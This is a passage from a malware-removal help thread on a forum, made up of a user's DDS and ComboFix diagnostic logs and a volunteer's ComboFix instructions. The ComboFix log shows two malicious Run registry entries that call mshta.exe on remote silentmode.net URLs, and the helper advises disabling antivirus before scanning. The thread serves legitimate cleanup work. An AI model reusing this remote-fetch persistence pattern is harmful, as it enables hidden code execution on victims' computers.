    FF - ProfilePath - c:\users\gagan\appdata\roaming\mozilla\firefox\profiles\bav5d5wt.default\
    FF - prefs.js: browser.search.selectedEngine - GoogIe
    FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
    FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
    FF - component: c:\program files\mcafee\siteadvisor\components\McFFPlg.dll
    FF - plugin: c:\program files\divx\divx ovs helper\npovshelper.dll
    FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll
    FF - plugin: c:\program files\mcafee\siteadvisor\NPMcFFPlg32.dll
    FF - plugin: c:\program files\microsoft silverlight\4.1.10329.0\npctrlui.dll
    FF - plugin: c:\program files\mozilla firefox\plugins\npPandoWebInst.dll
    FF - plugin: c:\program files\mozilla firefox\plugins\NPTURNMED.dll
    FF - plugin: c:\program files\oracle\javafx 2.0 runtime\bin\plugin2\npjp2.dll
    FF - plugin: c:\program files\veoh networks\veoh\plugins\noreg\NPVeohVersion.dll
    FF - plugin: c:\program files\veoh networks\veohwebplayer\npWebPlayerVideoPluginATL.dll
    FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprpchromebrowserrecordext.dll
    FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprphtml5videoshim.dll
    FF - plugin: c:\users\gagan\appdata\local\google\update\1.3.21.111\npGoogleUpdate3.dll
    FF - plugin: c:\users\gagan\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
    FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgoogletalk.dll
    FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgtpo3dautoplugin.dll
    FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_235.dll
    FF - plugin: c:\windows\system32\npDeployJava1.dll
    FF - plugin: c:\windows\system32\npmproxy.dll
    .
    ---- FIREFOX POLICIES ----
    .
    FF - user.js: browser.search.selectedEngine - GoogIe
    FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
    FF - user.js: yahoo.homepage.dontask - true
    ============= SERVICES / DRIVERS ===============
    .
    R0 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2012-3-20 171064]
    R1 MpKsl0ef4776f;MpKsl0ef4776f;c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys [2012-5-28 29904]
    R2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-6-19 21504]
    R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\progra~1\mcafee\sitead~1\mcsacore.exe [2011-5-24 95200]
    R2 TeamViewer6;TeamViewer 6;c:\program files\teamviewer\version6\TeamViewer_Service.exe [2011-1-27 2253688]
    S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
    S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\macromed\flash\FlashPlayerUpdateService.exe [2012-4-7 257696]
    S3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2012-3-20 74112]
    S3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\NisSrv.exe [2012-3-26 214952]
    S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]
    S3 WSDPrintDevice;WSD Print Support via UMB;c:\windows\system32\drivers\WSDPrint.sys [2008-6-19 16896]
    S4 dldt_device;dldt_device;c:\windows\system32\dldtcoms.exe -service --> c:\windows\system32\dldtcoms.exe -service [?]
    S4 dldtCATSCustConnectService;dldtCATSCustConnectService;c:\windows\system32\spool\drivers\w32x86\3\dldtserv.exe [2009-7-9 98984]
    S4 Giraffic;Veoh Giraffic Video Accelerator;c:\program files\giraffic\veoh_girafficwatchdog.exe --service --> c:\program files\giraffic\Veoh_GirafficWatchdog.exe --service [?]
    S4 StarWindServiceAE;StarWind AE Service;c:\program files\alcohol soft\alcohol 52\starwind\StarWindServiceAE.exe [2007-5-28 275968]
    .
    =============== Created Last 30 ================
    .
    2012-05-28 05:57:08 29904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys
    2012-05-28 05:06:52 6737808 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\mpengine.dll
    2012-05-23 20:07:25 6737808 ------w- c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
    2012-05-22 05:16:47 713784 ------w- c:\programdata\microsoft\microsoft antimalware\definition updates\{f78cef23-eb95-4ded-8458-48e319614326}\gapaengine.dll
    2012-05-22 05:09:57 -------- d-----w- c:\program files\Microsoft Security Client
    2012-05-19 08:37:25 6737808 ----a-w- c:\programdata\microsoft\windows defender\definition updates\{3070ec37-30ca-43ae-ac15-bbe0716a8aad}\mpengine.dll
    2012-05-19 05:43:51 -------- d-----w- c:\programdata\vsint
    2012-05-14 22:57:56 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
    2012-05-14 22:57:42 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
    2012-05-14 22:57:41 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
    2012-05-14 22:57:34 1404928 ----a-w- c:\program files\common files\microsoft shared\ink\InkObj.dll
    2012-05-14 22:57:32 936960 ----a-w- c:\program files\common files\microsoft shared\ink\journal.dll
    2012-05-14 22:57:20 1069056 ----a-w- c:\windows\system32\DWrite.dll
    2012-05-14 22:57:19 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
    2012-05-14 22:57:19 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
    2012-05-14 22:57:18 683008 ----a-w- c:\windows\system32\d2d1.dll
    2012-05-14 22:57:18 160768 ----a-w- c:\windows\system32\d3d10_1.dll
    2012-05-14 22:56:51 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
    2012-05-14 22:56:50 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
    2012-05-14 22:56:49 2044928 ----a-w- c:\windows\system32\win32k.sys
    2012-05-09 04:58:39 592824 ----a-w- c:\program files\mozilla firefox\gkmedias.dll
    2012-05-09 04:58:39 44472 ----a-w- c:\program files\mozilla firefox\mozglue.dll
    .
    ==================== Find3M ====================
    .
    2012-05-05 06:08:36 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
    2012-05-05 06:08:36 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
    2012-04-04 19:56:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
    2012-03-21 00:44:12 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
    2012-03-21 00:44:12 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
    2012-02-29 15:11:45 5120 ----a-w- c:\windows\system32\wmi.dll
    2012-02-29 15:11:42 172032 ----a-w- c:\windows\system32\wintrust.dll
    2012-02-29 15:09:53 157696 ----a-w- c:\windows\system32\imagehlp.dll
    2012-02-29 13:32:37 12800 ----a-w- c:\windows\system32\drivers\fs_rec.sys
    2012-02-28 11:30:48 916992 ----a-w- c:\windows\system32\wininet.dll
    2012-02-28 11:25:41 43520 ----a-w- c:\windows\system32\licmgr10.dll
    2012-02-28 11:25:17 1469440 ----a-w- c:\windows\system32\inetcpl.cpl
    2012-02-28 11:25:03 71680 ----a-w- c:\windows\system32\iesetup.dll
    2012-02-28 11:25:03 109056 ----a-w- c:\windows\system32\iesysprep.dll
    2012-02-28 10:07:57 385024 ----a-w- c:\windows\system32\html.iec
    2012-02-28 08:12:52 133632 ----a-w- c:\windows\system32\ieUnatt.exe
    2012-02-28 08:08:30 1638912 ----a-w- c:\windows\system32\mshtml.tlb
    .
    ============= FINISH: 3:18:17.35 ===============
     
  6. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    .
    UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
    IF REQUESTED, ZIP IT UP & ATTACH IT
    .
    DDS (Ver_2011-08-26.01)
    .
    Microsoft® Windows Vista™ Home Premium
    Boot Device: \Device\HarddiskVolume2
    Install Date: 7/31/2007 3:06:08 PM
    System Uptime: 5/28/2012 1:45:32 AM (2 hours ago)
    .
    Motherboard: TOSHIBA | | IALAA
    Processor: AMD Turion(tm) 64 X2 Mobile Technology TL-56 | Socket M2/S1G1 | 1800/200mhz
    .
    ==== Disk Partitions =========================
    .
    C: is FIXED (NTFS) - 231 GiB total, 26.845 GiB free.
    E: is CDROM ()
    F: is CDROM ()
    G: is CDROM ()
    .
    ==== Disabled Device Manager Items =============
    .
    Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
    Description: Microsoft 6to4 Adapter
    Device ID: ROOT\*6TO4MP\0000
    Manufacturer: Microsoft
    Name: Microsoft 6to4 Adapter
    PNP Device ID: ROOT\*6TO4MP\0000
    Service: tunnel
    .
    Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
    Description: Microsoft Tun Miniport Adapter
    Device ID: ROOT\*TUNMP\0001
    Manufacturer: Microsoft
    Name: Teredo Tunneling Pseudo-Interface
    PNP Device ID: ROOT\*TUNMP\0001
    Service: tunmp
    .
    Class GUID: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
    Description: Canon MX860 ser Network
    Device ID: ROOT\CANON_IJ_NETWORK\0000
    Manufacturer: Canon
    Name: Canon MX860 ser Network
    PNP Device ID: ROOT\CANON_IJ_NETWORK\0000
    Service: StillCam
    .
    ==== System Restore Points ===================
    .
    .
    ==== Installed Programs ======================
    .
    µTorrent
    Adobe Flash Player 11 Plugin
    Adobe Flash Player ActiveX
    Adobe Reader 8.1.5
    Adobe Shockwave Player
    Adobe® Photoshop® Album Starter Edition 3.2
    AGEIA PhysX v7.07.09
    Akamai NetSession Interface
    Akamai NetSession Interface Service
    ALPS Touch Pad Driver
    Apple Application Support
    Apple Mobile Device Support
    Apple Software Update
    Atheros Driver Installation Program
    ATI Catalyst Install Manager
    ATI Uninstaller
    Bejeweled Deluxe 1.87
    Bonjour
    Camera Assistant Software for Toshiba
    Canon IJ Network Scan Utility
    Canon IJ Network Tool
    Canon MX860 series MP Drivers
    Catalyst Control Center - Branding
    Catalyst Control Center Core Implementation
    Catalyst Control Center Graphics Full Existing
    Catalyst Control Center Graphics Full New
    Catalyst Control Center Graphics Light
    Catalyst Control Center Graphics Previews Vista
    Catalyst Control Center Localization Chinese Standard
    Catalyst Control Center Localization Chinese Traditional
    Catalyst Control Center Localization Dutch
    Catalyst Control Center Localization Finnish
    Catalyst Control Center Localization French
    Catalyst Control Center Localization German
    Catalyst Control Center Localization Greek
    Catalyst Control Center Localization Hungarian
    Catalyst Control Center Localization Italian
    Catalyst Control Center Localization Japanese
    Catalyst Control Center Localization Korean
    Catalyst Control Center Localization Norwegian
    Catalyst Control Center Localization Polish
    Catalyst Control Center Localization Portuguese
    Catalyst Control Center Localization Russian
    Catalyst Control Center Localization Spanish
    Catalyst Control Center Localization Swedish
    Catalyst Control Center Localization Thai
    Catalyst Control Center Localization Turkish
    ccc-core-static
    ccc-utility
    CCC Help Chinese Standard
    CCC Help Chinese Traditional
    CCC Help Czech
    CCC Help Danish
    CCC Help Dutch
    CCC Help English
    CCC Help Finnish
    CCC Help French
    CCC Help German
    CCC Help Greek
    CCC Help Hungarian
    CCC Help Italian
    CCC Help Japanese
    CCC Help Korean
    CCC Help Norwegian
    CCC Help Polish
    CCC Help Portuguese
    CCC Help Russian
    CCC Help Spanish
    CCC Help Swedish
    CCC Help Thai
    CCC Help Turkish
    CCleaner
    CD/DVD Drive Acoustic Silencer
    CloneDVD2
    Counter-Strike 1.0
    Counter-Strike 1.6
    Counter Strike 1.6 - By PirocaHP.F!N4LShare
    Counter Strike 1.6 - Pack 112 Mapas - By PirocaHP F!N4LShare
    D3DX10
    Dell Driver Download Manager
    Dell V305
    DivX Converter
    DivX Plus DirectShow Filters
    DivX Setup
    DivX Version Checker
    DVD MovieFactory for TOSHIBA
    DVDFab (Platinum/Gold/HD Decrypter) (Option: Mobile) 5.0.9.0
    EA SPORTS(TM) Cricket 07
    EPSON Easy Photo Print
    EPSON WorkForce 30 Series Printer Uninstall
    Google Chrome
    Google Talk (remove only)
    Google Talk Plugin
    HD Tune 2.55
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
    iPhone Configuration Utility
    iTunes
    Java Auto Updater
    Java(TM) 6 Update 29
    Java(TM) 7 Update 3
    Java(TM) SE Development Kit 7 Update 2
    Java(TM) SE Runtime Environment 6
    JavaFX 2.0.2 SDK
    JavaFX 2.0.3
    K-Lite Mega Codec Pack 6.2.0
    KB408682
    Magic DVD Ripper V5.1.1
    Magic ISO Maker v5.5 (build 0272)
    Malwarebytes Anti-Malware version 1.61.0.1400
    Max Payne
    McAfee SiteAdvisor
    Media Player Classic - Home Cinema v. 1.3.1249.0
    Microsoft .NET Framework 3.5 SP1
    Microsoft .NET Framework 4 Client Profile
    Microsoft Application Error Reporting
    Microsoft Flight Simulator X
    Microsoft Office XP Professional with FrontPage
    Microsoft Primary Interoperability Assemblies 2005
    Microsoft Security Client
    Microsoft Security Essentials
    Microsoft Silverlight
    Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
    Microsoft Visual C++ 2005 Redistributable
    Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
    Microsoft Works
    Microsoft XML Parser
    Mozilla Firefox 11.0 (x86 en-US)
    MSVC80_x86
    MSVCRT
    MSXML 4.0 SP2 (KB927978)
    MSXML 4.0 SP2 (KB936181)
    MSXML 4.0 SP2 (KB941833)
    MSXML 4.0 SP2 (KB954430)
    MSXML 4.0 SP2 (KB973688)
    MSXML 4.0 SP2 Parser and SDK
    Need for Speed Underground 2
    Need for Speed™ Most Wanted
    Nero BackItUp
    Nero BackItUp and Burn
    Nero BurnRights
    Nero Express
    Nero RescueAgent
    neroxml
    Oblivion
    OGA Notifier 2.0.0048.0
    Pando Media Booster
    PC Connectivity Solution
    PCFriendly
    Picasa 2
    QuickTime
    RealNetworks - Microsoft Visual C++ 2008 Runtime
    Realtek 8169 PCI, 8168 and 8101E PCIe Ethernet Network Card Driver for Windows Vista
    Realtek High Definition Audio Driver
    RealUpgrade 1.1
    Safari
    Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
    Security Update for Microsoft .NET Framework 3.5 SP1 (KB2657424)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2446708)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2478663)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2518870)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2539636)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2572078)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2633870)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368)
    Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)
    Security Update for Windows Media Encoder (KB2447961)
    Security Update for Windows Media Encoder (KB954156)
    Security Update for Windows Media Encoder (KB979332)
    Segoe UI
    Skins
    Skype™ 3.5
    Spelling Dictionaries Support For Adobe Reader 8
    Switch Sound File Converter
    Synaptics Pointing Device Driver
    Tales of Monkey Island
    TeamViewer 6
    Texas Instruments PCIxx21/x515/xx12 drivers.
    TIPCI
    TOSHIBA Assist
    TOSHIBA Disc Creator
    TOSHIBA DVD PLAYER
    TOSHIBA Extended Tiles for Windows Mobility Center
    TOSHIBA Flash Cards Support Utility
    TOSHIBA Hardware Setup
    Toshiba Registration
    TOSHIBA SD Memory Utilities
    TOSHIBA Software Modem
    TOSHIBA Software Upgrades
    TOSHIBA Supervisor Password
    TOSHIBA Value Added Package
    TuneUp Companion 2.2.7
    TypingMaster Pro
    Unity Web Player
    Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
    Update for Microsoft .NET Framework 4 Client Profile (KB2468871)
    Update for Microsoft .NET Framework 4 Client Profile (KB2533523)
    Update for Microsoft .NET Framework 4 Client Profile (KB2600217)
    Utility Common Driver
    uTorrentControl Toolbar
    VC80CRTRedist - 8.0.50727.6195
    VCRedistSetup
    Veoh Giraffic Video Accelerator
    Veoh Web Player
    VeohTV BETA
    VideoLAN VLC media player 0.8.6f
    Windows Live Communications Platform
    Windows Live Essentials
    Windows Live ID Sign-in Assistant
    Windows Live Installer
    Windows Live Messenger
    Windows Live Photo Common
    Windows Live PIMT Platform
    Windows Live SOXE
    Windows Live SOXE Definitions
    Windows Live UX Platform
    Windows Live UX Platform Language Pack
    Windows Media Encoder 9 Series
    Windows Media Player Firefox Plugin
    WinImage
    WinRAR archiver
    Yahoo! Detect
    Yahoo! Install Manager
    Yahoo! Messenger
    Zeus & Poseidon
    .
    ==== Event Viewer Messages From Past Week ========
    .
    5/28/2012 12:57:13 AM, Error: Microsoft-Windows-SharedAccess_NAT [31004] - The DNS proxy agent was unable to allocate 0 bytes of memory. This may indicate that the system is low on virtual memory, or that the memory manager has encountered an internal error.
    5/28/2012 1:48:09 AM, Error: Microsoft-Windows-DistributedCOM [10016] - The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
    5/28/2012 1:47:38 AM, Error: Service Control Manager [7000] - The Parallel port driver service failed to start due to the following error: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
    5/28/2012 1:47:31 AM, Error: PlugPlayManager [12] - The device 'PIONEER DVD-RW DVR-K17LF ATA Device' (IDE\CdRomPIONEER_DVD-RW_DVR-K17LF________________4.53____\5&383a5e59&0&0.0.0) disappeared from the system without first being prepared for removal.
    5/28/2012 1:47:27 AM, Error: cdrom [15] - The device, \Device\CdRom0, is not ready for access yet.
    5/28/2012 1:47:27 AM, Error: atapi [11] - The driver detected a controller error on \Device\Ide\IdePort2.
    5/23/2012 3:53:51 PM, Error: EventLog [6008] - The previous system shutdown at 3:52:17 PM on 5/23/2012 was unexpected.
    .
    ==== End Of File ===========================
     
  7. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    also i don't know if it helps my physical memory usage always is above 50%
     
  8. Mark1956

    Mark1956 Malware Specialist

    Joined:
    May 7, 2011
    Messages:
    14,142
    Ok, thanks for the logs. Please now follow this to run Combofix and post the log.

    IMPORTANT
    I see you have a P2P File Sharing Program installed on your system: uTorrent.
    As long as you continue to use these types of programs you can expect to get infected.
    P2P file sharing is one of the most common sources for picking up infections.
    Please uninstall the program from your system in Programs & Features via the Control Panel.
    If you insist in keeping it on your system then please DO NOT USE IT until we are finished.

    STEP 1



    NOTE: If you have already used Combofix please delete the icon from your desktop.
    • Please download DeFogger and save it to your desktop.
    • Once downloaded, double-click on the DeFogger icon to start the tool.
    • The application window will appear.
    • You should now click on the Disable button to disable your CD Emulation drivers.
    • When it prompts you whether or not you want to continue, please click on the Yes button to continue.
    • When the program has completed you will see a Finished! message. Click on the OK button to exit the program.
    • If CD Emulation programs are present and have been disabled, DeFogger will now ask you to reboot the machine. Please allow it to do so by clicking on the OK button.
    STEP 2



    Please download ComboFix [​IMG] from one of the locations below and save it to your Desktop. <-Important!!!
    Be sure to print out and follow these instructions: A guide and tutorial on using ComboFix



    Vista/Windows 7 users can skip the Recovery Console instructions and use the Windows DVD to boot into the Vista Recovery Environment or Windows 7 System Recovery Options if something goes awry. If you do not have a Windows 7 DVD then please create a Windows 7 Repair Disc. XP users need to install the Recovery Console first.
    • Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results". Click this link to see a list of such programs and how to disable them.
    • If ComboFix detects an older version of itself, you will be asked to update the program.
    • ComboFix will begin by showing a Disclaimer. Read it and click I Agree if you want to continue.
    • Follow the prompts and click on Yes to continue scanning for malware.
    • If using Windows 7 or Vista and you receive a UAC prompt asking if you want to continue running the program, you should press the Continue button.
    • When finished, please copy and paste the contents of C:\ComboFix.txt (which will open after reboot) in your next reply.
    • Be sure to re-enable your anti-virus and other security programs.
    -- Do not touch your mouse/keyboard until the ComboFix scan has completed, as this may cause the process to stall or the computer to lock.
    -- ComboFix will temporarily disable your desktop, and if interrupted may leave it disabled. If this occurs, please reboot to restore it.
    -- ComboFix disables autorun of all CD, floppy and USB devices to assist with malware removal and increase security.
    If you no longer have access to your Internet connection after running ComboFix, please reboot to restore it. If that does not restore the connection, then follow the instructions for Manually restoring the Internet connection provided in the "How to Guide" you printed out earlier.
     
  9. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    ComboFix 12-05-28.05 - GAGAN 05/28/2012 22:36:29.1.2 - x86
    Microsoft® Windows Vista&#8482; Home Premium 6.0.6002.2.1252.1.1033.18.1917.999 [GMT -4:00]
    Running from: c:\users\GAGAN\Downloads\ComboFix.exe
    AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
    SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
    SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    .
    .
    ((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    c:\programdata\xp
    c:\programdata\xp\EBLib.dll
    c:\programdata\xp\TPwSav.sys
    c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}
    c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome.manifest
    c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome\content\overlay.xul
    c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\install.rdf
    c:\windows\system32\CTF
    c:\windows\system32\CTF\ctfmon.txt
    c:\windows\system32\CTF\Links\OtherProducts.html
    .
    .
    ((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-29 )))))))))))))))))))))))))))))))
    .
    .
    2012-05-28 05:06 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A66FBB99-C8AC-44BC-83F6-4037B1F477F7}\mpengine.dll
    2012-05-23 20:07 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
    2012-05-22 05:16 . 2012-05-22 05:16 713784 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
    2012-05-22 05:09 . 2012-05-22 05:10 -------- d-----w- c:\program files\Microsoft Security Client
    2012-05-19 08:37 . 2012-05-08 16:40 6737808 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
    2012-05-19 05:43 . 2012-05-19 09:50 -------- d-----w- c:\programdata\vsint
    2012-05-14 22:57 . 2012-03-20 23:28 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
    2012-05-14 22:57 . 2012-03-30 12:39 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
    2012-05-14 22:57 . 2012-03-29 13:39 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
    2012-05-14 22:57 . 2012-02-01 15:10 1404928 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
    2012-05-14 22:57 . 2012-02-01 15:10 936960 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
    2012-05-14 22:57 . 2012-02-29 13:41 1069056 ----a-w- c:\windows\system32\DWrite.dll
    2012-05-14 22:57 . 2012-03-01 14:46 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
    2012-05-14 22:57 . 2012-02-29 14:08 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
    2012-05-14 22:57 . 2012-03-01 14:46 160768 ----a-w- c:\windows\system32\d3d10_1.dll
    2012-05-14 22:57 . 2012-02-29 13:44 683008 ----a-w- c:\windows\system32\d2d1.dll
    2012-05-14 22:56 . 2012-04-03 08:16 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
    2012-05-14 22:56 . 2012-04-03 08:16 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
    2012-05-14 22:56 . 2012-04-02 13:36 2044928 ----a-w- c:\windows\system32\win32k.sys
    2012-05-09 04:58 . 2012-05-09 04:58 592824 ----a-w- c:\program files\Mozilla Firefox\gkmedias.dll
    2012-05-09 04:58 . 2012-05-09 04:58 44472 ----a-w- c:\program files\Mozilla Firefox\mozglue.dll
    .
    .
    .
    (((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2012-05-05 06:08 . 2012-04-07 05:22 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
    2012-05-05 06:08 . 2011-06-14 22:11 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
    2012-04-04 19:56 . 2010-02-20 07:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
    2012-03-21 00:44 . 2012-03-21 00:44 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
    2012-03-21 00:44 . 2012-03-21 00:44 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
    2012-02-29 15:11 . 2012-04-14 06:43 5120 ----a-w- c:\windows\system32\wmi.dll
    2012-02-29 15:11 . 2012-04-14 06:43 172032 ----a-w- c:\windows\system32\wintrust.dll
    2012-02-29 15:09 . 2012-04-14 06:43 157696 ----a-w- c:\windows\system32\imagehlp.dll
    2012-02-29 13:32 . 2012-04-14 06:43 12800 ----a-w- c:\windows\system32\drivers\fs_rec.sys
    2012-05-09 04:58 . 2011-06-08 03:45 97208 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
    .
    .
    ((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    *Note* empty entries & legit default entries are not shown
    REGEDIT4
    .
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
    "{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
    2011-05-09 08:49 176936 ----a-w- c:\program files\uTorrentControl\prxtbuTor.dll
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
    "{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
    "{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1" [?]
    "RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP" [?]
    "Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
    "Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
    "Skytel"="Skytel.exe" [2007-05-29 1826816]
    "Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
    "00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
    "SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
    "QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
